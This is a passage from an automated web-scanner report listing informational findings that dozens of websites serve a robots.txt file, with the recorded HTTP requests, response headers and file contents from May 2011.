GET /robots.txt HTTP/1.0
Host: www.lifeaftertheoilcrash.net

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:19:04 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Fri, 04 Feb 2011 17:43:20 GMT
ETag: "0ac3393c4cb1:2"
Content-Length: 625

# Block a bot that was causing issues by ignoring Disallow lines below
User-Agent: OmniExplorer_Bot
Disallow: /

# Block hotlinking of music files by projectplaylist.com due to perceived user band
...[SNIP]...

27.995. http://www.lifetoday.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifetoday.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lifetoday.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:32:34 GMT
Server: Apache
Last-Modified: Mon, 17 Jan 2011 11:03:10 GMT
Accept-Ranges: bytes
Content-Length: 148
Connection: close
Content-Type: text/plain

User-agent:    *

Disallow:    /assets/
Disallow:    /cgi-bin/
Disallow:    /cms/
Disallow:    /css/
Disallow:    /images/
Disallow:    /js/
Disallow:    /resource_assets/

27.996. http://www.lightningcustoms.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lightningcustoms.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lightningcustoms.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:28:05 GMT
Server: Apache/2.2.15 (Fedora)
Last-Modified: Thu, 03 Dec 2009 14:02:08 GMT
ETag: "ce10c-24-479d36fd2f800"
Accept-Ranges: bytes
Content-Length: 36
Connection: close
Content-Type: text/plain

User-Agent: *
Dissallow: /image.php

27.997. http://www.liketelevision.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.liketelevision.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.liketelevision.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:08:32 GMT
Server: Apache/1.3.41 (Unix) PHP/4.4.7 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.7a
Last-Modified: Thu, 12 Mar 2009 22:10:29 GMT
ETag: "34103ab-51-49b98855"
Accept-Ranges: bytes
Content-Length: 81
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /abc/
Disallow: /amex/
Disallow: /elmer/
Disallow: /roc/

27.998. http://www.liketotally80s.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.liketotally80s.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.liketotally80s.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:51:47 GMT
Server: Apache
Last-Modified: Thu, 01 Jul 2010 12:40:40 GMT
ETag: "5aa47-44-48a52c726c200"
Accept-Ranges: bytes
Content-Length: 68
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google
Disallow:

User-agent: *
Disallow:

27.999. http://www.lincc.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lincc.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lincc.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:04:11 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7a
Last-Modified: Fri, 25 Sep 2009 18:40:03 GMT
ETag: "8c30f-74-4746b46ae66c0"
Accept-Ranges: bytes
Content-Length: 116
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: * # directed to all spiders
Disallow: /cgi-bin
Disallow: /testit
Disallow: *old*
Disallow: /


27.1000. http://www.lincolncenter.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lincolncenter.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lincolncenter.org

Response

HTTP/1.1 200 OK
Content-Length: 1126
Content-Type: text/plain
Last-Modified: Wed, 08 Apr 2009 19:26:36 GMT
Accept-Ranges: bytes
ETag: "bafac9ee7fb8c91:30b"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:54:24 GMT
Connection: close

User-agent: *
Disallow: /images/
Disallow: /flash/
Disallow: /pdfs/
Disallow: /podcasts/
Disallow: /lci/
Disallow: /asc
Disallow: /advanced_search.asp
Disallow: /all_events.asp
Disallow: /css
...[SNIP]...

27.1001. http://www.linesthataregood.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.linesthataregood.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.linesthataregood.com

Response

HTTP/1.1 200 Special Default
Date: Wed, 04 May 2011 00:48:15 GMT
Server: .V07 Apache
Last-Modified: Fri, 23 Mar 2001 18:20:14 GMT
Content-length: 108
Keep-Alive: timeout=999999, max=999999
Connection: Keep-Alive
Content-Type: text/plain

# Default /robots.txt File for all Community Architect Partner pages

User-agent: *
Disallow: /cgi-bin/

27.1002. http://www.linkchina.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.linkchina.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.linkchina.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.14
Date: Wed, 04 May 2011 03:08:02 GMT
Content-Type: text/plain
Content-Length: 368
Last-Modified: Mon, 18 Oct 2010 01:52:06 GMT
Connection: close
Accept-Ranges: bytes

# robots.txt file for http://www.linkchina.com

User-agent: *

Disallow: /*.do
Disallow: /html/about_us.html
Disallow: /html/terms_of_use.html
Disallow: /html/selected_seller.html
Disallow: /h
...[SNIP]...

27.1003. http://www.linkworth.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.linkworth.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.linkworth.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:41:08 GMT
Server: Apache
Last-Modified: Sat, 02 Jun 2007 04:30:06 GMT
ETag: "f9449-33a-4660f24e"
Accept-Ranges: bytes
Content-Length: 826
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /?a=

Disallow: /*?a=

Disallow: /_private/

Disallow: /act/

Disallow: /adm/

Disallow: /cgi-bin

Disallow: /tools

Disallow: /old

Disallow: /inc

Disall
...[SNIP]...

27.1004. http://www.liquidmotors.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.liquidmotors.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.liquidmotors.com

Response

HTTP/1.1 200 OK
Content-Length: 473
Content-Type: text/plain
Last-Modified: Tue, 20 Jul 2010 19:34:44 GMT
Accept-Ranges: bytes
ETag: "0e2c89a4228cb1:1aa64"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:13:17 GMT
Connection: close

# /robots.txt file for http://www.liquidmotors.com

Sitemap: http://www.liquidmotors.com/sitemap.xml


User-agent: *
Disallow: /bin
Disallow: /cfg
Disallow: /RowDef
Disallow: /templates

Us
...[SNIP]...

27.1005. http://www.littlewoods.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.littlewoods.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.littlewoods.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 28 Oct 2010 13:26:28 GMT
ETag: "118-493ad4a0f8900"
Content-Type: text/plain
Date: Wed, 04 May 2011 01:21:18 GMT
Content-Length: 280
Connection: close

User-agent: *
Disallow: /content/popup/
Disallow: /e/q/
Disallow: *session*

Sitemap: http://www.littlewoods.com/sitemap/index.xml
Video Sitemap: http://www.littlewoods.com/sitemap/video-sitema
...[SNIP]...

27.1006. http://www.livetvcenter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livetvcenter.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.livetvcenter.com

Response

HTTP/1.1 200 OK
Content-Length: 24
Content-Type: text/plain
Last-Modified: Thu, 14 Jan 2010 02:49:30 GMT
Accept-Ranges: bytes
ETag: "0999731c494ca1:46e1"
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:53:29 GMT
Connection: close

User-agent: *
Disallow:

27.1007. http://www.livewellhd.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livewellhd.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.livewellhd.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Connection: close
Date: Wed, 04 May 2011 01:42:30 GMT
Content-Length: 490
Content-Type: text/plain
Last-Modified: Tue, 28 Aug 2007 21:57:15 GMT
Accept-Ranges: bytes
ETag: "802ff264bee9c71:22c0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abclow01
X-Powered-By: ASP.NET
Cache-Expires: Wed, 04 May 2011 01:40:16 GMT

# robots.txt for http://abclocal.go.com/

User-agent: *
Disallow: /ad/
Disallow: /audio/
Disallow: /beacon/
Disallow: /ECards_images/
Disallow: /errors/

Disallow: /flash/
Disallow: /graphic
...[SNIP]...

27.1008. http://www.livingontheedge.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livingontheedge.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.livingontheedge.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:45:11 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 20 Oct 2009 21:32:51 GMT
ETag: "1b2ab62-2c-9ab1e6c0"
Accept-Ranges: bytes
Content-Length: 44
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /archived/
Allow: /

27.1009. http://www.ljmsite.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ljmsite.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ljmsite.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:07:46 GMT
Server: Apache/1.3.37 (Unix) mod_gzip/1.3.19.1a PHP/4.4.4 mod_ssl/2.8.28 OpenSSL/0.9.6m
Last-Modified: Sun, 13 Sep 2009 16:53:46 GMT
ETag: "1565247-70-4aad239a"
Accept-Ranges: bytes
Content-Length: 112
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /photos/
Disallow: /videos/
Disallow: /cgi-bin/
user-agent: stress-agent
Disallow: /


27.1010. http://www.loan.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.loan.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.loan.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:17:58 GMT
Server: Apache
Last-Modified: Tue, 24 Jul 2007 00:46:04 GMT
ETag: "3641b89-91-435f7b7d18b00"
Accept-Ranges: bytes
Content-Length: 145
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerloan_pool=1055133868.0.0000; path=/

User-agent: *
Disallow: /click/
Disallow: /about.htm
Disallow: /privacy.htm
Disallow: /personal/
Disallow: /help/
Disallow: /flash/home.swf

27.1011. http://www.loans-in60-seconds.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.loans-in60-seconds.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.loans-in60-seconds.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:21:09 GMT
Server: Apache/1.3.41 (Unix) PHP/5.3.5 mod_ssl/2.8.31 OpenSSL/0.9.8q
Last-Modified: Fri, 14 Jan 2011 20:01:27 GMT
ETag: "4a9f25-e7-4d30ab97"
Accept-Ranges: bytes
Content-Length: 231
Connection: close
Content-Type: text/plain

User-Agent: *

Disallow: /_old/
Disallow: /inc/
Disallow: /includes/
Disallow: /privacy/
Disallow: /terms/
Disallow: /unsub/

Noindex: /_old/
Noindex: /inc/
Noindex: /includes/
Noindex: /privacy/
Noin
...[SNIP]...

27.1012. http://www.loansin1-minute.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.loansin1-minute.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.loansin1-minute.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:26:23 GMT
Server: Apache/1.3.41 (Unix) PHP/5.3.5 mod_ssl/2.8.31 OpenSSL/0.9.8q
Last-Modified: Mon, 24 Jan 2011 18:35:50 GMT
ETag: "1bf064c-e7-4d3dc686"
Accept-Ranges: bytes
Content-Length: 231
Connection: close
Content-Type: text/plain

User-Agent: *

Disallow: /_old/
Disallow: /inc/
Disallow: /includes/
Disallow: /privacy/
Disallow: /terms/
Disallow: /unsub/

Noindex: /_old/
Noindex: /inc/
Noindex: /includes/
Noindex: /privacy/
Noin
...[SNIP]...

27.1013. http://www.localbiketrader.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.localbiketrader.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.localbiketrader.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:11:36 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.2
Vary: Accept-Encoding
Cache-Control: max-age=2592000
Content-Length: 139
Content-Type: text/plain; charset=UTF-8


Sitemap: http://www.localbiketrader.com/sitemaps/localbiketradersitemapindex.xml
User-Agent: *
Allow: /
Disallow: /adserver
Disallow: /ox

27.1014. http://www.localdat.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.localdat.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.localdat.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:51:09 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Last-Modified: Fri, 11 Jun 2010 19:13:32 GMT
ETag: "13622c2-6a-488c5ef536f00"
Accept-Ranges: bytes
Content-Length: 106
Connection: close
Content-Type: text/plain

# Disallow Web Bots
User-agent: *
Disallow: /

# Disallow Archive Bots
User-agent: ia_archiver
Disallow: /

27.1015. http://www.locanto.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.locanto.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.locanto.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:28:39 GMT
Server: Apache
Last-Modified: Mon, 18 Apr 2011 07:58:38 GMT
ETag: "190509-1b5d-4a12cc257a780"
Accept-Ranges: bytes
Content-Length: 7005
Cache-Control: max-age=300
Expires: Wed, 04 May 2011 01:33:39 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

##############################
# robots.txt file
# based on webmasterworld.com
# and searchengineworld.com
# Please, we do NOT allow nonauthorized robots any longer.
# Yes, feel free to copy and
...[SNIP]...

27.1016. http://www.lockridgehomes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lockridgehomes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lockridgehomes.com

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Length: 23
Content-Type: text/plain
Expires: -1
Last-Modified: Mon, 27 Dec 2010 19:26:42 GMT
Accept-Ranges: bytes
ETag: "27b70fefba5cb1:27d5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:57:27 GMT
Connection: close

User-Agent: *
Allow: /

27.1017. http://www.locox.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.locox.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.locox.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:40:37 GMT
Server: Apache
Cache-Control: max-age=604800
Content-Length: 104
NS_RTIMER_COMPOSITE: -260894125:73686F702D6A6176613034312E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: NS_VER=2010.2.0; domain=www.locox.com; path=/
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=714
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

# Allow all robots to spider everything by disallowing nothing

User-agent: *
Crawl-Delay: 10
Disallow:

27.1018. http://www.logih.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.logih.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.logih.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:56:24 GMT
Server: Apache
Last-Modified: Thu, 23 Apr 2009 05:09:16 GMT
ETag: "240fcb0-88-46831e1b0f700"
Accept-Ranges: bytes
Content-Length: 136
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /cpx.php
Disallow: /medios1.php
Disallow: /toolbar.php
Disallow: /check_image.php
Disallow: /check_popunder.php

27.1019. http://www.logotv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.logotv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.logotv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Sat, 20 Feb 2010 01:39:42 GMT
ETag: "5c2b929-84-47ffe46239380"
Accept-Ranges: bytes
Content-Length: 132
Content-Type: text/plain
Cache-Control: max-age=1800
Date: Wed, 04 May 2011 02:37:28 GMT
Connection: close

User-agent: *

Disallow: /*?kw=mtvsearch2
Sitemap: http://www.logotv.com/sitemap.xml

User-Agent: Slurp

Disallow: /*?kw=mtvsearch2$

27.1020. http://www.lol-jokes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lol-jokes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lol-jokes.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:42:16 GMT
Content-Type: text/plain
Connection: close
Server: Apache/Nginx/Varnish
Last-Modified: Sat, 19 Apr 2008 09:36:00 GMT
ETag: "b56ef450-b7-44b3698294000"
Accept-Ranges: bytes
Cache-Control: max-age=14400, public
Expires: Wed, 04 May 2011 06:42:16 GMT
Content-Length: 183
Accept-Ranges: bytes
Age: 0

User-agent: *
Disallow: /backup/
Disallow: /files/
Disallow: /images/
Disallow: /includes/
Disallow: /modules/
Disallow: /scripts/
Disallow: /sites/
Disallow: /themes/
Disallow: /cns/

27.1021. http://www.lomography.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lomography.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lomography.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Wed, 04 May 2011 04:04:04 GMT
Content-Type: text/plain
Connection: close
Content-Length: 948
Last-Modified: Fri, 29 Oct 2010 07:48:02 GMT
Accept-Ranges: bytes

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

27.1022. http://www.lompocrecord.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lompocrecord.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lompocrecord.com

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=900
X-TNCMS-Memory-Usage: 2077624
Content-Type: text/plain; charset=UTF-8
X-TNCMS-Venue: app
Date: Wed, 04 May 2011 02:03:38 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0415
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: lompocrecord.com
X-TNCMS-Served-By: cmsapp6
Content-Length: 1681

User-agent: MSNBot
Crawl-delay: 3
Disallow: /content/tncms/live/
Disallow: /content/tncms/ads/
Disallow: /search/?
Disallow: /*?mode=print
Disallow: /*?print
Disallow: /*?mode=story
Disallow:
...[SNIP]...

27.1023. http://www.lonely-wife-hookup.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lonely-wife-hookup.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lonely-wife-hookup.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 03:06:09 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 28 Oct 2010 14:37:32 GMT
Accept-Ranges: bytes
Content-Length: 217
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt to block all bots except bots from Google , MSN , Yahoo
User-agent: Googlebot
Disallow:
User-agent: Slurp
Disallow:
User-agent: MSNBot
Disallow:
User-agent: ia_archiver
Disallow:
User-age
...[SNIP]...

27.1024. http://www.longabergerhomesteadstore.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.longabergerhomesteadstore.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.longabergerhomesteadstore.com

Response

HTTP/1.1 200 OK
Set-Cookie: tlcnj4-http-cookie=R3651926190; path=/
Content-Length: 2590
Content-Type: text/plain
Last-Modified: Mon, 21 Jan 2008 02:02:00 GMT
Accept-Ranges: bytes
ETag: "01cc99bd15bc81:caa"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:15:07 GMT
Connection: close

User-agent: *
Disallow: /ASPDNSFCommon/
Disallow: /ASPDNSFEncrypt/
Disallow: /ASPDNSFGateways/
Disallow: /ASPDNSFPatterns/
Disallow: /ASPDNSFQuickBooks/
Disallow: /bin/
Disallow: /categorydescr
...[SNIP]...

27.1025. http://www.lookupemailaddresses.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lookupemailaddresses.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lookupemailaddresses.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Date: Wed, 04 May 2011 02:06:35 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-jkmkfeml=F2689852FD73E588E6BC2251E4852A80; path=/
Last-Modified: Tue, 13 Jul 2010 20:57:06 GMT
Content-Length: 41

User-agent: *
Disallow: /results/jump.php

27.1026. http://www.loti.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.loti.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.loti.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:31:39 GMT
Server: Apache/2.2.17
Last-Modified: Tue, 22 Mar 2011 05:31:44 GMT
ETag: "2b-49f0b8f459000"
Accept-Ranges: bytes
Content-Length: 43
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:

27.1027. http://www.loveyourbaby.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.loveyourbaby.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.loveyourbaby.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:57:45 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.loveyourbaby.com/iXoy0UEw.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow: /dyn/
Di
...[SNIP]...

27.1028. http://www.low-carb-diet-recipes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.low-carb-diet-recipes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.low-carb-diet-recipes.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:47:21 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 17 Aug 2004 13:53:19 GMT
ETag: "f1c55d-c2-3e1d9df33d1c0"
Accept-Ranges: bytes
Content-Length: 194
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: forum/post-*.html$
Disallow: forum/updates-topic.html*$
Disallow: forum/stop-updates-topic.html*$
Disallow: forum/ptopic*.html$
Disallow: forum/ntopic*.html$

27.1029. http://www.lrn.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lrn.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lrn.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:45:47 GMT
Server: LWS
Last-Modified: Tue, 01 Jun 2010 20:13:51 GMT
ETag: "c6ae-130-487fd9ca35e61"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain
Set-Cookie: BIGipServermarketing=1660227136.20480.0000; path=/

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

27.1030. http://www.lugaluda.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lugaluda.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lugaluda.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:21:21 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 22 Apr 2011 22:37:14 GMT
Accept-Ranges: bytes
Content-Length: 12922
Connection: close
Content-Type: text/plain

...sitemap:Disallow: /sitemap.xml
User-Agent: *
Allow: /
Disallow: /wp-content/plugins/
Disallow: /cgi-bin
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /2008/
Disallow: /2009/
Disallo
...[SNIP]...

27.1031. http://www.lunabean.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lunabean.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lunabean.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:52:51 GMT
Server: Apache/2.0.54 (Fedora)
Last-Modified: Fri, 13 Apr 2007 21:13:16 GMT
Accept-Ranges: bytes
Content-Length: 98
Vary: Accept-Encoding,User-Agent
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /graphics/
Disallow: /dropdown/
Disallow: /YaBBImages/

27.1032. http://www.lutherauto.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lutherauto.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lutherauto.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:55:14 GMT
Server: Microsoft-IIS/6.0
X-Server: 03
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
